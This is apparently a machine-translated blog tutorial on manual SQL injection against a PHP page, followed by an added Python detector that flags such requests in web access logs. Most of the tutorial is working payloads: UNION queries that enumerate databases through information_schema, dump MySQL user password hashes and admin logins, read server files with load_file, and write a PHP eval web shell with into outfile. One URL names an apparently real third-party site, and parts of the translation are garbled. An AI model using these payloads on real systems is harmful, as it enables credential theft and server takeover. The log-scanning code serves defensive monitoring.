To make manual injection easy to follow, sql.php serves as the injection point: the classic case where the id parameter is not filtered, so the SQL statement is inserted through that parameter. You can import the database file test.sql.
The injection uses the information_schema system database together with the group_concat() function; group_concat() is powerful and can bypass the limit restriction.
http://www.bkjia.com/sql.php?id=1 union select 0, 0, 0
The column count is 3.
http://www.bkjia.com/sql.php?id=1 and 1=2 union select count(*), 1, 1 from mysql.user
Counts the number of users in the database.
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, 2, group_concat(schema_name) from information_schema.schemata
During testing, only root or an account with global privileges could expose all the databases.
This displays all of the database names on the MySQL server.
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema = 0x74657374
This displays all the tables in the test database; 0x74657374 is the hex value of the string test.
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, 2, group_concat(column_name) from information_schema.columns where table_name = 0x61646D696E
This displays all the field names in the admin table.
The injection technique is flexible, and it breaks through the limit restriction.
Let's look at the injection statements Pangolin uses.
Only root or global privileges allow the following operations:
select user from mysql.user
http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat (char (94), char (94), char (94), user, char (94), char (94 ), char (94), 1, 1 from (select * from mysql.user order by user limit 6, 1) t order by user desc) t limit 1 -- view the users in the database
http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat (char (94), char (94), char (94), password, char (94), char (94 ), char (94), 1, 1 from (select * from mysql.user order by user limit 6, 1) t order by user desc) t limit 1 -- view the password of the corresponding user
Keep changing the offset in limit 2, 1 to view all of them:
http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat (char (94), char (94), char (94), password, char (94), char (94 ), char (94), 1, 1 from (select * from mysql.user order by user limit 2, 1) t order by user desc) t limit 1 --
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, username, password from admin limit 0, 10
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, username, password from admin limit 1, 10
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, username, password from admin limit 2, 10
Retrieve the records by using limit.
You can also use the group_concat() function to display everything at once:
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, group_concat(username), group_concat(password) from admin
Note that the path used with into outfile is c:/2ww.php.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (60), char (63), char (112), char (104), char (112 ), char (32), char (101), char (118), char (97), char (108), char (40), char (36), char (95 ), char (80), char (79), char (83), char (84), char (91), char (99), char (109), char (100 ), char (93), char (41), char (63), char (62), 1,1 into outfile c:/cm14dd. php
<? Php eval ($ _ POST [cmd])?> Asc code
Char (60), char (63), char (112), char (104), char (112), char (32), char (101), char (118 ), char (97), char (108), char (40), char (36), char (95), char (80), char (79), char (83 ), char (84), char (91), char (99), char (109), char (100), char (93), char (41), char (63 ), char (62)
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, <? Php eval ($ _ POST [cmd])?>, 3 into outfile c:/tt33.txt
Using load_file
http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat (char (94), char (94), char (94), load_file (0x633a5c626f6f742e696e69), char (94 ), char (94), char (94), 1, 1 --
0x633a5c626f6f742e696e69 is the hex encoding of c:\boot.ini.
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1, 2, load_file (c:/boot.ini)
Http://www.nowpc.net/concrete.php? Id = 5% 20and % 201 = 2% 20 union % 20 select % ,,2, 3, 4, group_concat (schema_name) % 20 from % 20information_schema.schemata
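As an added defender's example (not part of the original post), the following Python scores web-server access-log requests against the payload shapes walked through above (UNION SELECT, information_schema, group_concat, into outfile, load_file, hex-encoded names), so that probes like these surface in monitoring; the log lines are constructed and the signature weights and threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Weighted signatures for the payload shapes this page walks through; the
# weights are an assumption chosen so one bare UNION SELECT is enough to flag.
SIGNATURES = [
    ("union select", r"\bunion\s+(all\s+)?select\b", 3),
    ("information_schema", r"\binformation_schema\.", 3),
    ("group_concat", r"\bgroup_concat\s*\(", 2),
    ("into outfile", r"\binto\s+(out|dump)file\b", 4),
    ("load_file", r"\bload_file\s*\(", 4),
    ("hex literal", r"\b0x[0-9a-f]{6,}\b", 1),
    ("and 1=2", r"\b(and|or)\s+1\s*=\s*[12]\b", 1),
]
# Combined-format access log line: client IP ... "METHOD target HTTP/x".
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

def normalise(target):
    # Percent-decode ('+' and %20 both become spaces), lowercase, and collapse
    # whitespace runs so "union%20%20select" still matches the signature.
    return re.sub(r"\s+", " ", unquote_plus(target).lower())

def score_request(target):
    # Return (score, matched signature names) for one request target.
    text = normalise(target)
    hits = [(name, w) for name, rx, w in SIGNATURES if re.search(rx, text)]
    return sum(w for _, w in hits), [name for name, _ in hits]

def scan_log(lines, threshold=3):
    # Return (ip, target, score, hits) for every request scoring >= threshold.
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            ip, target = m.groups()
            score, hits = score_request(target)
            if score >= threshold:
                flagged.append((ip, target, score, hits))
    return flagged

# Constructed sample log (not real traffic): a normal request, three probes
# shaped like the page's payloads, and a benign search containing "union".
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /sql.php?id=1%20union%20select%200,0,0 HTTP/1.1" 200 530',
    '10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /sql.php?id=1%20and%201=2%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x74657374 HTTP/1.1" 200 610',
    '10.0.0.5 - - [10/Oct/2023:13:55:50 +0000] "GET /sql.php?id=1%20and%201=2%20union%20select%201,2,load_file(0x633a5c626f6f742e696e69) HTTP/1.1" 200 900',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=union+of+sets+select+few HTTP/1.1" 200 2048',
]
```

Running `scan_log(SAMPLE_LOG)` flags the three sql.php probes from 10.0.0.5 and leaves both benign requests unflagged.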